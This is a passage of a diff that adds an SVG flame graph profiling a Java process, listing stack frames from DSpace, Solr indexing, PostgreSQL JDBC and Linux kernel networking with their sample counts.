+<text  x="1043.62" y="943.5" ></text>
+</g>
+<g >
+<title>rcu_note_context_switch (1 samples, 0.09%)</title><rect x="131.4" y="1109" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="134.44" y="1119.5" ></text>
+</g>
+<g >
+<title>validate_xmit_skb (2 samples, 0.18%)</title><rect x="342.1" y="965" width="2.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="345.08" y="975.5" ></text>
+</g>
+<g >
+<title>acpi_ev_detect_gpe (1 samples, 0.09%)</title><rect x="132.5" y="981" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="135.51" y="991.5" ></text>
+</g>
+<g >
+<title>tcp_mstamp_refresh (1 samples, 0.09%)</title><rect x="288.3" y="741" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="291.34" y="751.5" ></text>
+</g>
+<g >
+<title>__pthread_getspecific (1 samples, 0.09%)</title><rect x="661.3" y="725" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="664.26" y="735.5" ></text>
+</g>
+<g >
+<title>[[vdso]] (1 samples, 0.09%)</title><rect x="837.5" y="869" width="1.1" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="840.50" y="879.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.09%)</title><rect x="745.1" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="748.08" y="943.5" ></text>
+</g>
+<g >
+<title>prepare_exit_to_usermode (1 samples, 0.09%)</title><rect x="696.7" y="837" width="1.1" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="699.72" y="847.5" ></text>
+</g>
+<g >
+<title>__ext4_find_entry (1 samples, 0.09%)</title><rect x="11.1" y="1109" width="1.0" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="14.07" y="1119.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="733.3" y="901" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="736.26" y="911.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (3 samples, 0.27%)</title><rect x="884.8" y="869" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="887.79" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%)</title><rect x="742.9" y="773" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="745.93" y="783.5" ></text>
+</g>
+<g >
+<title>__x64_sys_sendto (193 samples, 17.58%)</title><rect x="159.4" y="1269" width="207.4" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="162.38" y="1279.5" >__x64_sys_sendto</text>
+</g>
+<g >
+<title>org/dspace/eperson/Group:::find (4 samples, 0.36%)</title><rect x="740.8" y="949" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="959.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_one_core (1 samples, 0.09%)</title><rect x="1078.2" y="357" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1081.23" y="367.5" ></text>
+</g>
+<g >
+<title>ipv4_dst_check (2 samples, 0.18%)</title><rect x="345.3" y="1077" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="348.30" y="1087.5" ></text>
+</g>
+<g >
+<title>__mark_inode_dirty (2 samples, 0.18%)</title><rect x="409.8" y="581" width="2.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="412.78" y="591.5" ></text>
+</g>
+<g >
+<title>tcp_event_new_data_sent (3 samples, 0.27%)</title><rect x="353.9" y="1125" width="3.2" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="356.90" y="1135.5" ></text>
+</g>
+<g >
+<title>org/apache/http/message/BasicLineParser:::parseStatusLine (1 samples, 0.09%)</title><rect x="1087.9" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1090.91" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (8 samples, 0.73%)</title><rect x="1133.0" y="981" width="8.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.04" y="991.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="418.4" y="725" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="421.38" y="735.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="177.7" y="1093" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="180.65" y="1103.5" ></text>
+</g>
+<g >
+<title>__x64_sys_write (2 samples, 0.18%)</title><rect x="409.8" y="725" width="2.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="412.78" y="735.5" ></text>
+</g>
+<g >
+<title>irqtime_account_irq (1 samples, 0.09%)</title><rect x="229.2" y="933" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="232.23" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendSync (2 samples, 0.18%)</title><rect x="822.5" y="821" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="825.46" y="831.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="901" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="911.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.09%)</title><rect x="823.5" y="789" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="826.53" y="799.5" ></text>
+</g>
+<g >
+<title>tcp_check_space (2 samples, 0.18%)</title><rect x="246.4" y="757" width="2.2" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="249.43" y="767.5" ></text>
+</g>
+<g >
+<title>__skb_datagram_iter (1 samples, 0.09%)</title><rect x="94.9" y="1189" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="97.90" y="1199.5" ></text>
+</g>
+<g >
+<title>__skb_clone (1 samples, 0.09%)</title><rect x="348.5" y="1093" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="351.52" y="1103.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (19 samples, 1.73%)</title><rect x="1092.2" y="901" width="20.4" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1095.20" y="911.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::resetChanged (1 samples, 0.09%)</title><rect x="851.5" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="854.48" y="895.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/SolrBrowseCreateDAO:::additionalIndex (110 samples, 10.02%)</title><rect x="610.7" y="965" width="118.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="613.75" y="975.5" >org/dspace/bro..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeXML (49 samples, 4.46%)</title><rect x="471.0" y="869" width="52.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="474.04" y="879.5" >org/a..</text>
+</g>
+<g >
+<title>java/util/HashMap:::put (2 samples, 0.18%)</title><rect x="695.6" y="869" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="698.65" y="879.5" ></text>
+</g>
+<g >
+<title>bio_endio (1 samples, 0.09%)</title><rect x="137.9" y="917" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="140.89" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (4 samples, 0.36%)</title><rect x="740.8" y="901" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="911.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (3 samples, 0.27%)</title><rect x="543.0" y="677" width="3.3" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="546.04" y="687.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeanNamesForType (74 samples, 6.74%)</title><rect x="936.4" y="917" width="79.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="939.38" y="927.5" >org/sprin..</text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="579.6" y="933" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="582.58" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.09%)</title><rect x="867.6" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="895.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Node:::study (1 samples, 0.09%)</title><rect x="921.3" y="661" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="924.33" y="671.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.09%)</title><rect x="755.8" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="758.83" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="733.3" y="885" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="736.26" y="895.5" ></text>
+</g>
+<g >
+<title>java/net/URLEncoder:::encode (2 samples, 0.18%)</title><rect x="1056.7" y="965" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1059.74" y="975.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (4 samples, 0.36%)</title><rect x="863.3" y="949" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="866.30" y="959.5" ></text>
+</g>
+<g >
+<title>JNU_ThrowByName (2 samples, 0.18%)</title><rect x="540.9" y="821" width="2.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="543.89" y="831.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Connection$TransactionCommandHandler:::handleCompletion (1 samples, 0.09%)</title><rect x="1173.9" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1176.88" y="975.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="1151.3" y="901" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.31" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%)</title><rect x="734.3" y="901" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="737.34" y="911.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (5 samples, 0.46%)</title><rect x="548.4" y="581" width="5.4" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="551.42" y="591.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (5 samples, 0.46%)</title><rect x="835.4" y="949" width="5.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="838.36" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="877.3" y="901" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="880.27" y="911.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (2 samples, 0.18%)</title><rect x="885.9" y="837" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="888.87" y="847.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="789" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="799.5" ></text>
+</g>
+<g >
+<title>swake_up_locked.part.0 (1 samples, 0.09%)</title><rect x="964.3" y="757" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="967.32" y="767.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="836.4" y="885" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="839.43" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (5 samples, 0.46%)</title><rect x="785.9" y="869" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.92" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (4 samples, 0.36%)</title><rect x="1167.4" y="949" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1170.43" y="959.5" ></text>
+</g>
+<g >
+<title>update_min_vruntime (2 samples, 0.18%)</title><rect x="107.8" y="1061" width="2.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="110.80" y="1071.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="531.2" y="885" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="534.22" y="895.5" ></text>
+</g>
+<g >
+<title>java/util/GregorianCalendar:::computeFields (1 samples, 0.09%)</title><rect x="1042.8" y="917" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1045.77" y="927.5" ></text>
+</g>
+<g >
+<title>tcp_queue_rcv (1 samples, 0.09%)</title><rect x="289.4" y="741" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="292.42" y="751.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="663.4" y="853" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="666.41" y="863.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="748.3" y="917" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="751.31" y="927.5" ></text>
+</g>
+<g >
+<title>ext4_mark_inode_dirty (1 samples, 0.09%)</title><rect x="1139.5" y="629" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1142.49" y="639.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%)</title><rect x="814.9" y="789" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="817.94" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/http/conn/routing/HttpRoute:::hashCode (1 samples, 0.09%)</title><rect x="464.6" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="467.59" y="927.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::Receive (1 samples, 0.09%)</title><rect x="421.6" y="741" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="751.5" ></text>
+</g>
+<g >
+<title>vtable stub (2 samples, 0.18%)</title><rect x="918.1" y="565" width="2.2" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="921.11" y="575.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.09%)</title><rect x="860.1" y="789" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="863.07" y="799.5" ></text>
+</g>
+<g >
+<title>sched_clock_cpu (1 samples, 0.09%)</title><rect x="334.6" y="933" width="1.0" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="337.55" y="943.5" ></text>
+</g>
+<g >
+<title>_raw_spin_lock_irqsave (1 samples, 0.09%)</title><rect x="98.1" y="1157" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="101.12" y="1167.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.18%)</title><rect x="760.1" y="869" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.13" y="879.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (1 samples, 0.09%)</title><rect x="344.2" y="1045" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="347.23" y="1055.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/lang/time/FastDateFormat$TwoDigitMonthField:::appendTo (1 samples, 0.09%)</title><rect x="594.6" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="597.63" y="975.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="1172.8" y="933" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1175.81" y="943.5" ></text>
+</g>
+<g >
+<title>handle_irq_event_percpu (1 samples, 0.09%)</title><rect x="421.6" y="645" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="424.60" y="655.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (5 samples, 0.46%)</title><rect x="295.9" y="789" width="5.3" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="298.87" y="799.5" ></text>
+</g>
+<g >
+<title>fput_many (2 samples, 0.18%)</title><rect x="159.4" y="1237" width="2.1" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="162.38" y="1247.5" ></text>
+</g>
+<g >
+<title>java/text/SimpleDateFormat:::subFormat (2 samples, 0.18%)</title><rect x="487.2" y="805" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="490.16" y="815.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/bitstore/BitstreamStorageManager:::getFile (1 samples, 0.09%)</title><rect x="420.5" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="423.53" y="927.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 0.64%)</title><rect x="1101.9" y="661" width="7.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1104.88" y="671.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (3 samples, 0.27%)</title><rect x="740.8" y="805" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="815.5" ></text>
+</g>
+<g >
+<title>do_softirq_own_stack (101 samples, 9.20%)</title><rect x="228.2" y="965" width="108.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="231.16" y="975.5" >do_softirq_ow..</text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (61 samples, 5.56%)</title><rect x="13.2" y="1301" width="65.6" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="16.22" y="1311.5" >pthread..</text>
+</g>
+<g >
+<title>sk_reset_timer (1 samples, 0.09%)</title><rect x="356.0" y="1093" width="1.1" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="359.05" y="1103.5" ></text>
+</g>
+<g >
+<title>__ip_local_out (1 samples, 0.09%)</title><rect x="249.7" y="629" width="1.0" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="252.65" y="639.5" ></text>
+</g>
+<g >
+<title>__ip_local_out (1 samples, 0.09%)</title><rect x="1121.2" y="645" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="1124.22" y="655.5" ></text>
+</g>
+<g >
+<title>copy_user_enhanced_fast_string (2 samples, 0.18%)</title><rect x="170.1" y="1157" width="2.2" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="173.13" y="1167.5" ></text>
+</g>
+<g >
+<title>jbyte_arraycopy (1 samples, 0.09%)</title><rect x="750.5" y="805" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="753.46" y="815.5" ></text>
+</g>
+<g >
+<title>acpi_hw_read (1 samples, 0.09%)</title><rect x="421.6" y="549" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="424.60" y="559.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (13 samples, 1.18%)</title><rect x="540.9" y="869" width="14.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="543.89" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/params/ModifiableSolrParams:::getParams (1 samples, 0.09%)</title><rect x="566.7" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="569.68" y="959.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject$MetadataCache:::get (30 samples, 2.73%)</title><rect x="766.6" y="949" width="32.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="769.58" y="959.5" >or..</text>
+</g>
+<g >
+<title>org/dspace/core/Context:::cache (1 samples, 0.09%)</title><rect x="844.0" y="933" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="846.95" y="943.5" ></text>
+</g>
+<g >
+<title>java (1,098 samples, 100.00%)</title><rect x="10.0" y="1333" width="1180.0" height="15.0" fill="rgb(224,86,86)" rx="2" ry="2" />
+<text  x="13.00" y="1343.5" >java</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::query (4 samples, 0.36%)</title><rect x="820.3" y="933" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.31" y="943.5" ></text>
+</g>
+<g >
+<title>hrtimer_init_sleeper (1 samples, 0.09%)</title><rect x="1109.4" y="741" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="1112.40" y="751.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/LnRSolrServiceIndexPlugin:::additionalIndex (4 samples, 0.36%)</title><rect x="574.2" y="965" width="4.3" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="577.21" y="975.5" ></text>
+</g>
+<g >
+<title>__sys_sendto (193 samples, 17.58%)</title><rect x="159.4" y="1253" width="207.4" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="162.38" y="1263.5" >__sys_sendto</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="1032.0" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1035.02" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (2 samples, 0.18%)</title><rect x="918.1" y="613" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="921.11" y="623.5" ></text>
+</g>
+<g >
+<title>ip_rcv (89 samples, 8.11%)</title><rect x="235.7" y="869" width="95.6" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="238.68" y="879.5" >ip_rcv</text>
+</g>
+<g >
+<title>nf_conntrack_in (2 samples, 0.18%)</title><rect x="304.5" y="821" width="2.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="307.46" y="831.5" ></text>
+</g>
+<g >
+<title>__ip_local_out (1 samples, 0.09%)</title><rect x="1078.2" y="117" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="1081.23" y="127.5" ></text>
+</g>
+<g >
+<title>schedule (2 samples, 0.18%)</title><rect x="1110.5" y="741" width="2.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1113.47" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="1147.0" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1150.01" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="797.7" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="800.74" y="927.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::notifyAll (1 samples, 0.09%)</title><rect x="764.4" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="767.43" y="911.5" ></text>
+</g>
+<g >
+<title>__kfree_skb (2 samples, 0.18%)</title><rect x="92.8" y="1189" width="2.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="95.75" y="1199.5" ></text>
+</g>
+<g >
+<title>ksys_write (2 samples, 0.18%)</title><rect x="409.8" y="709" width="2.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="412.78" y="719.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (3 samples, 0.27%)</title><rect x="917.0" y="629" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="639.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (2 samples, 0.18%)</title><rect x="731.1" y="917" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="734.11" y="927.5" ></text>
+</g>
+<g >
+<title>__tcp_transmit_skb (1 samples, 0.09%)</title><rect x="1078.2" y="597" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1081.23" y="607.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="1166.4" y="965" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1169.36" y="975.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range (6 samples, 0.55%)</title><rect x="547.3" y="725" width="6.5" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="550.34" y="735.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="798.8" y="885" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="801.82" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::addField (14 samples, 1.28%)</title><rect x="595.7" y="965" width="15.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="598.70" y="975.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 0.36%)</title><rect x="658.0" y="741" width="4.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="661.03" y="751.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (3 samples, 0.27%)</title><rect x="917.0" y="741" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (4 samples, 0.36%)</title><rect x="1112.6" y="933" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1115.62" y="943.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="802.0" y="901" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="805.04" y="911.5" ></text>
+</g>
+<g >
+<title>__skb_clone (1 samples, 0.09%)</title><rect x="199.1" y="1109" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="202.14" y="1119.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getBoolean (1 samples, 0.09%)</title><rect x="1150.2" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1153.24" y="943.5" ></text>
+</g>
+<g >
+<title>___slab_alloc.isra.0 (1 samples, 0.09%)</title><rect x="188.4" y="1109" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="191.40" y="1119.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (1 samples, 0.09%)</title><rect x="753.7" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="756.68" y="959.5" ></text>
+</g>
+<g >
